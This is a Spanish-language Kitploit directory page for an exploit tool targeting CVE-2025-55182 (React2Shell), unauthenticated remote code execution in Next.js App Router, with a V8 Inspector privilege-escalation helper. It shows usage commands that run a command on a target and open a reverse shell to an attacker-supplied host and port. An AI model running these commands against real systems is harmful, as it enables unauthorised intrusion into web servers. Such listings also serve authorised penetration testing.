Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Exploit independiente para CVE-2025-55182 que logra RCE no autenticado en Next.js App Router mediante la deserialización Flight de React Server Components, con shell inversa y asistente de escalada de privilegios Node.js V8 Inspector. | Kitploit
Herramientas/GitHubGitHub/r3vpwnx/cve-2025-55182
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubr3vpwnx/cve-2025-55182

CVE-2025-55182

Exploit independiente para CVE-2025-55182 que logra RCE no autenticado en Next.js App Router mediante la deserialización Flight de React Server Components, con shell inversa y asistente de escalada de privilegios Node.js V8 Inspector.

Ver Repositorio
hace 20h 42mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182 - React2Shell (CVE-2025-55182) RCE no autenticado mediante deserialización de Flight de React Server Components

Exploit independiente para CVE-2025-55182 en aplicaciones Next.js App Router que habilitan React Server Components. Payloads RSC Flight manipulados enviados al endpoint de server-action permiten ejecución remota de código sin autenticación. Incluye un helper de escalada de privilegios local de Node.js V8 Inspector (puerto de depuración) que ejecuta código en un proceso privilegiado mediante una evasión de sandbox con process.mainModule.require.

CVE: CVE-2025-55182

Requisitos

root@kitploit:~
python3 -m pip install requests    # para los PoC(s) en Python

Uso

cdp_privesc.py

root@kitploit:~
python3 cdp_privesc.py <objetivo>

(RCE RSC — incluido, ver Créditos)

react2shell-poc.py
root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"          # exfiltración de comandos basada en errores
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444

Referencias

  • https://github.com/p3ta00/react2shell-poc
  • https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce

Créditos

react2shell-poc.py es el PoC público de CVE-2025-55182 de p3ta00, incluido sin cambios desde https://github.com/p3ta00/react2shell-poc para una cadena autocontenida. cdp_privesc.py (la escalada de privilegios local de Node.js V8 Inspector) es original.

Aviso legal

Solo para pruebas de seguridad autorizadas y fines educativos. Ejecútalo únicamente contra sistemas que poseas o para los que tengas permiso escrito explícito para probar.


Autor: r3vpwnx

Descargar herramienta